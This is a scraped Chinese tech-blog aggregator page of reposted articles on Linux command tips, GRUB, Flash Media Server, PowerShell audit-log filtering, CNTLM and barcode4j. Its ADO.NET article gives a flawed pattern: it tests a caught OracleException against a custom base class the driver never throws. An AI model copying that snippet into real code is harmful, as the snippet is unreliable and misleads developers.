/usr/bin/postmaster start > /dev/null 2>&1" < /dev/null 改为: su -l postgres -s /bin/sh -c "/usr/bin/pg_ctl -o -o -F -i -w -D $PGDATA -p /usr/bin/postmaster start > /dev/null 2>&1" < /dev/null 这样就可以启动数据库的tcp/ip链接了 二十一.如何将man转存为文本文件 以ls的man为例 man ls |col -b >ls.txt 将info变成文本,以make为例 info make -o make.txt -s 二十二.如何在文本模式下发送2进制文件 首先检查系统有没有uuencode 和 uudecode如果没有从光盘上装 rpm -ivh sharutils-x.xx.x-x.rpm 假设要发送的文件是vpopmail-5.2.1.tar.gz执行 uuencode -m vpopmail-5.2.1.tar.gz vpopmail.tar.gz>encodefile 说明: uuenode是编码命令,-m是使用mime64编码,vpopmail-5.2.1.tar.gz是要编码的文件,vpopmail.tar.gz是如果解码后得到的文件名,encodefile是编码后的文件名。 执行上述命令之后就可以通过mail命令发送编码后的文件了 mail chenlf@chinalinuxpub.com<encodefile 好了,现在我来接收邮件 在控制台上输入mail命令: mail Mail version 8.1 6/6/93. Type ? for help. "/var/spool/mail/chenlf": 2 messages 2 new >N 1 chenlf@ns1.catv.net Mon Jun 10 16:44 17/363 N 2 root@ns2.catv.net Mon Jun 10 16:45 6091/371145 & 2 Message 2: From root@ns2.catv.net Mon Jun 10 16:45:28 2002 Date: Mon, 10 Jun 2002 16:44:51 +0800 From: root <root@ns2.catv.net> To: chenlf@chinalinuxpub.com begin-base64 644 vpopmai.tar.gz H4sIABr15TwAA+w9a2PbNpL7NfwVqNPbWIlFPSzbiR2n9SuxE7/OcuLNtdmU EiGLMUWqfFhWt7u//eYBgKRE2U7iTa+3VndjiQQGg5nBYDAYDC6H4XDgeH51 yW7ajdpf/h2fer1VX1lagr/1+spyq/BXff5SX2mtNBZXmovN5l/qjWZrqfEX sfRvwWbik8aJEwnxl7ifDofXlLvp/Z/0c1nk/8uN/777NuqNen251ZrB/+XF pcUG8r/ZbC0vL9ZXoPwi/O8von73qEx//sP5bwHHxanT8aUIe2IrDBIZJLFl 7QVJFFovpZOkkYxFL4yEFhVLCKhk1W2xG45E1wnEnohlIsJAiksvSlLHF24I JQORhKIjRdKXYhh5Ayca6xcAD8DQm4HT7XuB/EGcSXgbPErEyAkSrNp3LqVw grGoyaRbGzpxPHJFGssotq0Gtw6l9gTgJbixode9EOlQDMaTmEjE/AerydVc rAY4jJzIFY7vC3wL2DgJvJIxIjFwkm6fWkfw1KoAIti/EgkWc3A6YRp05ReB aeXAQH34GoXOwAvOVUnoEnwRYRqJeJAMgczRpYzEyEv6YQoUH8oACltLtjjD Rr1YOCJ2BkPgJop1IuJu5A0TYh9xIdQwfrCWTdt9pMKvaZg4j5jT3PgojC5+ sFZswM0LAJzvSyhGXQSCOmLoO9DtEOAicBCD2qUT1agAg44BSd+1niIEzVPs ................. ................. ................. & s 2 encodefile "encode" [New file] & q 然后进行解码 uudecode encodefile ls encodefile vpopmai.tar.gz tar zxvf vpopmail.tar.gz OK了 二十三.将 man page 转成 HTML 格式 使用 man2html 这个指令,就可以将 man page 转成 HTML 格式了。用法是: man2html filename > htmlfile.html 二十四.如何在gnome和kde之间切换。 如果你是以图形登录方式登录linux,那么点击登录界面上的session(任务)即可以选择gnome和kde。如果你是以文本方式登录,那执行switchdesk gnome或switchdesk kde,然后再startx就可以进入gnome或kde。 25...tar,.tar.gz,.bz2,.tar.bz2,.bz,.gz是什么文件,如何解开他们? 他们都是文件(压缩)包。 .tar:把文件打包,不压缩:tar cvf .tar dirName 解开:tar xvf .tar .tar.gz:把文件打包并压缩:tar czvf .tar.gz dirName 解开:tar xzvf .tar.gz .bz2:解开:bzip2 -d .bz2 .bz:解开:bzip -d .bz .gz:解开:gzip -d .gz 26.linux下如何解开.zip,.rar压缩文件? rh8下有一个图形界面的软件file-roller可以做这件事。令外可以用unzip .zip解开zip文件,unrar .rar解开rar文件,不过unrar一般系统不自带,要到网上下载。 27.linux下如何浏览.iso光盘镜像文件? a.建一个目录,如:mkdir a b.把iso文件挂载到该目录上:mount -o loop xxxx.iso a 现在目录a里的内容就是iso文件里的内容了。 28.linux下如何配置网络? 用netconfig。“IP address:”就是要配置的IP地址,“Netmask:”子网掩码,“Default gateway (IP):”网关,“Primary nameserver:”DNS服务器IP。 29.如何让鼠标支持滚轮? 在配置鼠标时,选择微软的鼠标,并正确选择端口如ps2,usb等 30.如何让控制台支持中文显示? 安装zhcon。zhcon需要libimm_server.so和libpth.so.13这两个库支持。一般的中文输入法应该都有libimm_server.so。libpth.so.13出自pth-1.3.x。把这两个文件放到/usr/lib下就行了。 31.如何配置grub? 修改/boot/grub/grub.conf文件。其中 “default=n”(n是个数字)是grub引导菜单默认被选中的项,n从0开始,0表示第一项,1表示第二项,依此类推。 “timeout=x”(x是一个数)是超时时间,单位是妙。也就是引导菜单显示后,如果x秒内用户不进行选择,那么grub将启动默认项。 “splashimage =xxxxxx”,这是引导菜单的背景图,先不理他。 其它常用项我用下面的例子来说明: title Red Hat 8.0 root (hd1,6) kernel /boot/vmlinuz-2.4.18-14 ro root=/dev/hdb7 initrd /boot/initrd-2.4.18-14.img 其中"Red Hat 8.0"是在启动菜单列表里显示的名字 root (hdx,y)用来指定你的boot分区位置,如果你没有分boot分区(本例就没分boot分区),那就指向根分区就行了,hdx是linux所在硬盘,hd0是第一块硬盘,hd1是第二块,依此类推。y是分区位置,从0开始,也就是等于分区号减一,比如你要指向的分区是hdx7,那么y就是6,如果是hdx1,那y就是0。注意root后面要有一个空格。 kernel /boot/vmlinuz-2.4.18-14,其中"/boot/vmlinuz-2.4.18-14"是你要用的内核路径,如果你编译了心内核,把它改成你的新内核的路径就行了。 ro就不用管,写上不会有错。 root=/dev/hdxx指定根分区,本例是hdb7,所以root=/dev/hdb7 initrd xxxxxxxxxxxxx这行不要也行,目前我还不清楚它是做什么用的。 上面是linux的,下面是windows的 title windows 98 rootnoverify (hd0,0) chainloader +1 title xxxxxxx不用解释了,上面有解释。 rootnoverify (hdx,y)用来指定windows所在分区,x,y跟上面一样,注意rootnoverify后有空格。 chainloader +1照抄就行,注意空格。 本篇文章为转载内容。原文链接:https://blog.csdn.net/gudulyn/article/details/764890。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-10-27 09:27:49
255
转载
转载文章
...blog.csdn.net/weixin_30784141/article/details/98424685。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 原文地址 http://www.eyeapk.com/android-studio-update.html Mac OSX中修改文件路径为 bin/idea.vmoptions ,添加如下内容,如果无效修改http为https试试看 -Djava.net.preferIPv4Stack=true-Didea.updates.url=http://dl.google.com/android/studio/patches/updates.xml-Didea.patches.url=http://dl.google.com/android/studio/patches/ 如果仍然无效,可以修改http为https试试看,然后重启点击check update 转载于:https://www.cnblogs.com/niray/p/4251301.html 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_30784141/article/details/98424685。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-02-08 20:46:33
126
转载
转载文章
...的特性。文中提到的.NET 4.0引入了var 和 dynamic等关键字支持动态类型,这意味着开发者在编写代码时无需预先声明变量的具体数据类型,编译器或运行时环境会根据实际赋值自动推断或允许类型转换,从而提高了开发灵活性和效率。 弱类型语言 , 弱类型语言是一种对数据类型的检查相对宽松的语言,通常在编译阶段不强制要求变量具有固定的数据类型,并且允许不同类型的数据之间进行隐式转换。如文章中所述的VB.NET和PHP,在Web开发早期广泛应用,因其可以快速实现页面功能展示、方便修改等特点而受到青睐。 运行时编译 , 运行时编译(Runtime Compilation)是程序在运行过程中动态生成并执行代码的一种机制。文中提及的Razor引擎即采用了类似PHP的运行时编译技术,使得ASP.NET MVC框架下的视图模板能够在服务器端实时编译成可执行代码,这样开发者能够即时看到代码修改的效果,极大地提升了Web开发的迭代速度和便捷性。 第三方框架 , 第三方框架是指由非官方或社区成员创建的软件开发工具包,这些工具包提供了针对特定应用场景的预封装功能和解决方案。在本文中,虽然Java语言本身并不具备与.NET 4.0类似的动态类型原生支持,但通过使用第三方框架,开发者可以在一定程度上模拟实现类似的功能,以适应Web开发的需求和特点。 学院派 , 学院派在此处指的是遵循传统计算机科学教育理念,注重编程规范、强类型语言的正确性、健壮性和安全性的开发者群体。他们往往经过严格的科班训练,强调理论基础扎实和技术严谨性。 野路子派 , 野路子派则是指那些没有受过正规科班教育或不完全遵循传统开发理念,更倾向于灵活、敏捷开发方式的开发者群体。他们在Web开发实践中可能更多地依赖直觉、经验和创新思维,对于快速迭代、可视化以及实时修改等方面有较高的敏感度和执行力,因此能在Web开发领域取得成功。
2023-03-25 14:09:17
54
转载
转载文章
...blog.csdn.net/weixin_33895475/article/details/91647859。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 这个例子使用flash CS3来展示如何将一个flash文件连接到一个服务器端的脚本,别且如何从服务器获取数据。在这个例子里面,flash用户界面有一个Button组件(其实例名称是bt)和一个lebel组件(其实例名称是txt)。当一个用户点击Button,客户端连接到服务器;然后客户端运行服务器端的函数来返回一个字符串的值。当服务器端回应了,客户端的回应函数在label上显示字符传。客户端通过改变Button的label来断开连接。当diaconnect的按钮被点击,客户端断开连接,并且清空label。 ONE.创建用户界面 1.开启Flash CS3,然后选择新建>flash文件(ActionScript 3.0)。 2.选择窗口>组件,然后选择User Interface>Button。在属性栏里面为按钮取名bt。 3.添加一个Label组件,移动它到按钮上面,取名为txt。 保存文件为test.fla。 TWO.建立as文件。 输入以下代码: package { import flash.display.MovieClip; import flash.events.MouseEvent; import flash.events.NetStatusEvent; import flash.net.NetConnection; import flash.net.Responder; public class Main extends MovieClip { public var nc:NetConnection; public var myRespond:Responder; public function Main():void { txt.text=""; bt.label="请点击链接"; myRespond=new Responder(success,failed); bt.addEventListener(MouseEvent.CLICK,clickHandler); } private function clickHandler(e:MouseEvent) { if (bt.label=="请点击链接") { bt.label="请点击断开"; nc=new NetConnection(); nc.connect("rtmp://localhost/viniFMS"); nc.addEventListener(NetStatusEvent.NET_STATUS,statusHandler); nc.call("sayServermsg",myRespond,"Hi"); } else { txt.text=""; bt.label="请点击链接"; nc.close(); } } private function statusHandler(e:NetStatusEvent) { if (e.info.code=="NetConnection.Connect.Success") { trace("ok"); } } private function success(result:Object) { trace("成功:"+result.toString()); txt.text=result.toString(); } private function failed(result:Object) { trace("失败:"+result.toString()); } } } 将as文件保存为Main.as 在test.fla的属性那的文档类输入Main。保存。 Three:建立通讯文件(.asc) 1.选择文件>新建>actionscript通信文件。 输入以下代码: application.onConnect=function(client){ application.acceptConnection(client); client.sayServermsg=function(msg){ return msg+",欢迎你来到FMS的世界 !"; } } 将文件保存到fms的application的文件夹下的viniFMS文件夹下,文件名为:main.asc. 确保FMS的服务已经打开,80端口没有被php等占用。 然后运行flash,点击按钮。就会有结果出现了。如下图所示。 再点击按钮。关闭连接。再点就是打开。如此循环。客户端会得到服务器端返回的 数据。 一个客户端用actionscript编码来连接到服务器,处理事件,和做其它工作。通过flash CS3你可以使用actionscript 3.0,2.0或1.0,但是actionscript3.0提供更多特性。要想使用flex,你必须使用actionscript 3.0. Actionscript3.0显著的不同于actionscript 2.0。这个向导假设你是在正在编写actionscript 3.0的类,这些类是一些外部的.as文件,有符合你的开发环境的目录结构的包的名称 转载于:https://blog.51cto.com/vini123/681426 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_33895475/article/details/91647859。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-09-10 18:10:29
66
转载
转载文章
...blog.csdn.net/weixin_34112900/article/details/92532120。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 Windows日志筛选 因工作需求开启文件系统审核,因Windows日志管理器并不方便筛选查阅,所以使用powershell方法进行筛选。 一、需求分析 存在问题 日志量巨大(每天约1G) 日志管理器查询日志不便 主要目标 启用文件系统审核 快捷查询用户的删除操作 解决方案 采用轮替方式归档日志(500MB) 日志存放60天(可用脚本删除超过期限日志档案) 使用Get-WinEvent中的FilterXPath过日志进行筛选,格式打印 删除操作码为0x10000,可对其进行筛选 二、文件审核设置 2.1 开启文件系统审核功能 secpol.msc Advanced Audit Policy Configuration Object Access Audit File System [x] Configure the following audit events: [x] Success [x] Failure 2.2 建立共享文件夹 Folder Properties Sharing Choose people to share with Everyone 2.3 设置文件夹审核的用户组 Folder Properties Security Advanced Auditing Add user 2.4 设置日志路径及大小 Event Viewer Windows Logs Security Log Properties Log Path: E:\FileLog\Security.evtx Maximum log size(KB): 512000 [x] Archive the log when full,do not overwrite events 三、方法 筛选事件ID为4460日志 PS C:\Windows\system32> Get-WinEvent -LogName Security -FilterXPath "[System[EventID=4660]]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 10:01:37 AM 4660 Information An object was deleted....5/22/2018 9:03:11 AM 4660 Information An object was deleted.... 筛选文件删除日志 PS C:\Windows\system32> Get-WinEvent -LogName "Security" -FilterXPath "[EventData[Data[@Name='AccessMask']='0x10000']]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 10:01:37 AM 4663 Information An attempt was made to access an object....5/22/2018 9:03:11 AM 4663 Information An attempt was made to access an object.... 筛选指定用户文件删除日志 PS C:\Windows\system32> Get-WinEvent -LogName "Security" -FilterXPath "[EventData[Data[@Name='AccessMask']='0x10000']] and [EventData[Data[@Name='SubjectUserName']='lxy']]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 9:03:11 AM 4663 Information An attempt was made to access an object.... 以变量方式筛选指定用户文件删除日志 PS C:\Windows\system32> $AccessMask='0x10000'PS C:\Windows\system32> $UserName='lxy'PS C:\Windows\system32> Get-WinEvent -LogName "Security" -FilterXPath "[EventData[Data[@Name='AccessMask']='$AccessMask']] and [EventData[Data[@Name='SubjectUserName']='$UserName']]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 9:03:11 AM 4663 Information An attempt was made to access an object.... 从保存的文件筛选文件删除日志 PS C:\Users\F2844290> Get-WinEvent -Path 'C:\Users\F2844290\Desktop\SaveSec.evtx' -FilterXPath "[EventData[Data[@Name='AccessMask']='0x10000']]"PS C:\Windows\system32> $AccessMask='0x10000' 筛选10分钟内发生的安全性日志 XML中时间计算单位为ms,10minute=60 10 1000=600000 PS C:\Windows\system32> Get-WinEvent -LogName Security -FilterXPath "[System[TimeCreated[timediff(@SystemTime) < 600000]]]"ProviderName: Microsoft-Windows-Security-AuditingTimeCreated Id LevelDisplayName Message----------- -- ---------------- -------5/22/2018 4:11:30 PM 4663 Information An attempt was made to access an object....5/22/2018 4:11:30 PM 4663 Information An attempt was made to access an object....5/22/2018 4:11:30 PM 4663 Information An attempt was made to access an object....5/22/2018 4:11:30 PM 4663 Information An attempt was made to access an object.... 其它筛选方法 若有语法不明之处,可参考日志管理器中筛选当前日志的XML方法。 删除超过60天的存档日志并记录 Get-ChildItem E:\FileLog\Archive-Security- | Where-Object {if(( (get-date) - $_.CreationTime).TotalDays -gt 60 ){Remove-Item $_.FullName -ForceWrite-Output "$(Get-Date -UFormat "%Y/%m%d")t$_.Name" >>D:\RoMove-Archive-Logs.txt} } 四、其它文件 文件删除日志结构 Log Name: SecuritySource: Microsoft-Windows-Security-AuditingDate: 5/22/2018 9:03:11 AMEvent ID: 4663Task Category: File SystemLevel: InformationKeywords: Audit SuccessUser: N/AComputer: IDX-ST-05Description:An attempt was made to access an object.Subject:Security ID: IDX-ST-05\lxyAccount Name: lxyAccount Domain: IDX-ST-05Logon ID: 0x2ed3b8Object:Object Server: SecurityObject Type: FileObject Name: C:\Data\net.txtHandle ID: 0x444Process Information:Process ID: 0x4Process Name: Access Request Information:Accesses: DELETEAccess Mask: 0x10000Event Xml:<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /><EventID>4663</EventID><Version>0</Version><Level>0</Level><Task>12800</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime="2018-05-22T01:03:11.876720000Z" /><EventRecordID>1514</EventRecordID><Correlation /><Execution ProcessID="4" ThreadID="72" /><Channel>Security</Channel><Computer>IDX-ST-05</Computer><Security /></System><EventData><Data Name="SubjectUserSid">S-1-5-21-1815651738-4066643265-3072818021-1004</Data><Data Name="SubjectUserName">lxy</Data><Data Name="SubjectDomainName">IDX-ST-05</Data><Data Name="SubjectLogonId">0x2ed3b8</Data><Data Name="ObjectServer">Security</Data><Data Name="ObjectType">File</Data><Data Name="ObjectName">C:\Data\net.txt</Data><Data Name="HandleId">0x444</Data><Data Name="AccessList">%%1537</Data><Data Name="AccessMask">0x10000</Data><Data Name="ProcessId">0x4</Data><Data Name="ProcessName"></Data></EventData></Event> 文件操作码表 File ReadAccesses: ReadData (or ListDirectory)AccessMask: 0x1File WriteAccesses: WriteData (or AddFile)AccessMask: 0x2File DeleteAccesses: DELETEAccessMask: 0x10000File RenameAccesses: DELETEAccessMask: 0x10000File CopyAccesses: ReadData (or ListDirectory)AccessMask: 0x1File Permissions ChangeAccesses: WRITE_DACAccessMask: 0x40000File Ownership ChangeAccesses: WRITE_OWNERAccessMask: 0x80000 转载于:https://blog.51cto.com/linxy/2119150 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_34112900/article/details/92532120。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-12 11:51:46
151
转载
转载文章
...。近期,微软发布的.NET 5强化了程序集安全性和跨程序集协作能力,使得InternalsVisibleToAttribute这一特性在构建模块化、高内聚低耦合的软件系统时发挥更大作用。 例如,在大型企业级项目中,不同的团队可能负责不同功能模块的开发,每个模块作为一个独立的程序集。为了实现高效协作并保持代码整洁,团队间可以通过InternalsVisibleToAttribute共享内部实现细节,同时避免将这些细节暴露给最终用户或第三方组件。这种做法既保证了封装性,也增强了模块间的集成效率。 另外,针对面向对象设计原则中的封装性,有开发者撰文探讨如何结合C访问修饰符优化代码结构。文章指出,合理使用protected而非public进行继承设计,能够降低API接口的复杂度,并减少因公共接口变动带来的潜在风险。此外,对private字段与属性的审慎控制有助于提高数据安全性,防止外部代码直接修改对象状态,从而维护系统的稳定性。 与此同时,随着开源社区的发展,许多流行的C框架和库也充分利用了这些访问修饰符策略来设计更易用且健壮的API。比如ASP.NET Core框架,其内部大量采用internal类型及方法,并通过InternalsVisibleToAttribute向测试项目开放内部实现,确保了单元测试的全面性和深度,同时也保护了核心逻辑不受外界干扰。 综上所述,深入理解和灵活应用C中的访问修饰符是提升代码质量、保障软件安全性和维护性的关键步骤。随着技术的不断演进,访问控制策略也将持续服务于现代软件工程的需求,助力开发者构建更为强大而稳定的系统。
2023-02-02 17:54:25
330
转载
转载文章
在进一步了解ASP.NET中母版页嵌套结构及控件访问方法后,我们发现随着Web开发技术的演进,现代框架如ASP.NET Core提供了更为灵活和高效的页面布局与组件化管理机制。例如,在ASP.NET Core MVC中, Razor视图组件(View Components)被广泛用于实现可重用的UI逻辑块,它在某种程度上可以视为母版页功能的增强版,尤其是在处理复杂嵌套场景时。 近期一篇名为“Exploring View Components in ASP.NET Core: A Modern Alternative to Nested Master Pages”的文章深入探讨了这一话题。作者通过实例分析了如何利用Razor视图组件替代传统的多层嵌套母版页,以更简洁、模块化的代码来组织和复用页面内容。该文章还强调了使用视图组件所带来的性能优势以及对现代化前端开发实践的良好支持,如服务器端渲染与前端框架(如React或Angular)的集成。 此外,针对ASP.NET传统项目中FindControl方法的局限性,有开发者提出采用强类型视图模型结合Tag Helpers的方式,使得在处理嵌套布局时能够直接且安全地访问任何层级的控件,从而避免了动态查找可能导致的运行时错误和性能损耗。这种方案在社区内得到了积极反响,并在许多实际项目中得以应用。 综上所述,尽管原始文章讨论了在旧版ASP.NET中访问嵌套母版页控件的方法,但随着技术发展,我们可以转向研究ASP.NET Core中的新型解决方案,这些方案不仅解决了原有问题,还引入了更多优化和便捷特性,有助于提升开发效率和用户体验。对于关注此领域的开发者来说,紧跟最新技术趋势并适时进行技术栈升级,无疑具有极高的实践价值。
2023-11-19 12:06:40
299
转载
转载文章
...blog.csdn.net/weixin_30784141/article/details/96634076。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 下载CNTML http://cntlm.sourceforge.net/ 设置用户名密码 打开cntlm.ini文件,在Username,Domain, Password中写入相应的数据。 最后点击cntml.exe开始运行。 设置程序代理 在程序代理中写入127.0.0.1:3128(默认设置)。程序就可以连到外面了。 在公司内使用github只能通过代理连上,因为GIT不支持ntml代理认证。 转载于:https://www.cnblogs.com/Mingxx/archive/2012/11/06/2756915.html 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_30784141/article/details/96634076。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-03-01 12:15:31
72
转载
.net
.NET是一种由微软开发的软件框架,用于构建Windows应用程序、Web服务以及网络设备等。这篇文章呢,咱主要唠唠在.NET环境里头对付ADO.NET Oracle异常的那些招儿,特别是通过自定义一个基础类(custom base class),让咱们能够有个统一的方式来收拾这些Oracle异常。 一、概述 ADO.NET是.NET框架的一部分,用于提供对数据库的操作。它支持多种不同的数据库系统,包括Oracle。不过话说回来,Oracle自有一套错误模型和异常类型,这些家伙在.NET的地盘上,可能会有点“水土不服”,表现得不尽相同。为了搞定这个问题,我们可以自己动手设计一个基础类,把所有Oracle数据库可能会抛出的异常都一股脑儿装进这个基础类里。这样一来,当我们处理这些异常时,就只需要关注这个基础类,而无需对每个具体的异常类型都费心啦。 二、创建自定义基类 首先,我们需要创建一个新的类,作为所有Oracle异常的基类。以下是一个简单的例子: csharp public abstract class OracleExceptionBase : Exception { public string ErrorNumber { get; set; } protected OracleExceptionBase(string message) : base(message) { } } 在这个基类中,我们添加了一个新的属性ErrorNumber,用来存储Oracle的错误编号。这是因为Oracle的错误编号可以帮助我们更好地理解错误的原因。 三、处理Oracle异常 接下来,我们需要修改我们的代码,使其能够正确地处理Oracle异常。首先,咱们得瞧一瞧这个蹦出来的异常是不是咱们自定义的那个基类OracleExceptionBase的“后代”。如果是,那么我们就需要获取并显示该异常的ErrorNumber属性。 以下是一个例子: csharp try { // 连接Oracle数据库 using (var connection = new OracleConnection(connectionString)) { // 打开连接 connection.Open(); // 创建命令对象 var command = new OracleCommand("SELECT FROM Employees", connection); // 执行查询 var reader = command.ExecuteReader(); } } catch (OracleException ex) { if (ex is OracleExceptionBase oracleEx) { Console.WriteLine($"Oracle Error Number: {oracleEx.ErrorNumber}"); throw; } else { Console.WriteLine($"Other type of exception: {ex.Message}"); throw; } } 在这个例子中,如果捕获到的是OracleExceptionBase类型的异常,那么我们就打印出它的ErrorNumber属性,并重新抛出该异常。否则,我们就打印出其他类型的异常消息,并重新抛出该异常。 四、结论 总的来说,通过创建一个自定义的基类,我们可以统一处理所有的Oracle异常,使我们的代码更加简洁和易于维护。同时,我们也能够更好地理解和解决这些问题,提高我们的编程效率。 最后,我想说,编程不仅仅是解决问题的技术,更是一种艺术。写代码时,如果我们追求那种优雅简洁、一目了然的风格,就能让敲代码这件事变得超有乐趣,而且还能给我们的工作注入满满的意义感,让编程变得快乐而有价值。
2023-09-18 09:51:01
463
心灵驿站-t
转载文章
...blog.csdn.net/wangfei0904306/article/details/54895475。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 全国地址SQL数据文件(精确到区县) 导出自MYSQL CREATE TABLE com_area (id bigint(20) NOT NULL AUTO_INCREMENT,created_date datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,last_modified_date datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,display_order int(11) DEFAULT NULL,name varchar(100) COLLATE utf8_unicode_ci NOT NULL,pid bigint(20) DEFAULT NULL,PRIMARY KEY (id),KEY FK_Reference_02 (pid),CONSTRAINT com_area_ibfk_1 FOREIGN KEY (pid) REFERENCES com_area (id)) ENGINE=InnoDB AUTO_INCREMENT=3924 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;-- ------------------------------ Records of com_area-- ----------------------------INSERT INTO com_area VALUES ('1', '2016-10-29 08:07:39', '2016-10-29 08:07:39', '0', '1', null);INSERT INTO com_area VALUES ('2', '2016-10-29 08:07:44', '2016-10-29 08:07:44', '110000', '北京市', '1');INSERT INTO com_area VALUES ('3', '2016-10-29 08:07:44', '2016-10-29 08:07:44', '110101', '东城区', '2');...... 下载地址: http://download.csdn.net/detail/wangfei0904306/9748322 本篇文章为转载内容。原文链接:https://blog.csdn.net/wangfei0904306/article/details/54895475。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-06-30 09:11:08
62
转载
转载文章
...blog.csdn.net/kinmet2010/article/details/6921438。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。 1.barcode4j介绍 barcode4j是一款开源的条形码生成库,该库由Java语言编写。能够生成很多种编码的条形码,比如:code-39,code-128等等; 2 .在官方网站上下载http://barcode4j.sourceforge.net/相应的文件 3、 解压barcode4j-2.0alpha2-bin.zip这个包,在build目录下有barcode4j.jar,在lib目录下有avalon-framework-4.2.0.jar, 将barcode4j.jar和avalon-framework-4.2.0.jar添加到项目的lib中,刷新工程,然后在项目配置中将这两个jar包添加到classpath里面去。 4.在web项目中添加barcode4j.jar和avalon-framework-4.2.0.jar文件。(同3) 5.配置web.xml文件 <servlet> <servlet-name>BarcodeServlet</servlet-name> <servlet-class>com.yourname.BarcodeServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>BarcodeServlet</servlet-name> <url-pattern>/barcode</url-pattern> </servlet-mapping> 6.在页面使用<img>标签显示条形码图片<img src="<%=request.getContextPath() %>/barcode?msg=12345678"/> 注:参数说明(BarcodeServlet源代码中可以查看参数): msg:条形码文字; fmt:图片格式,默认svg,可以设置fmt = jpeg/png;type = code128/code39; hrp:条形码文字位置:hrp = top,默认为bottom hrsize:条形码文字大小 以mm为单位 <img src="<%=request.getContextPath() %>/barcode?msg=12345678&fmt=jpeg&hrp=top"/> 本篇文章为转载内容。原文链接:https://blog.csdn.net/kinmet2010/article/details/6921438。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-12-31 23:00:52
93
转载
转载文章
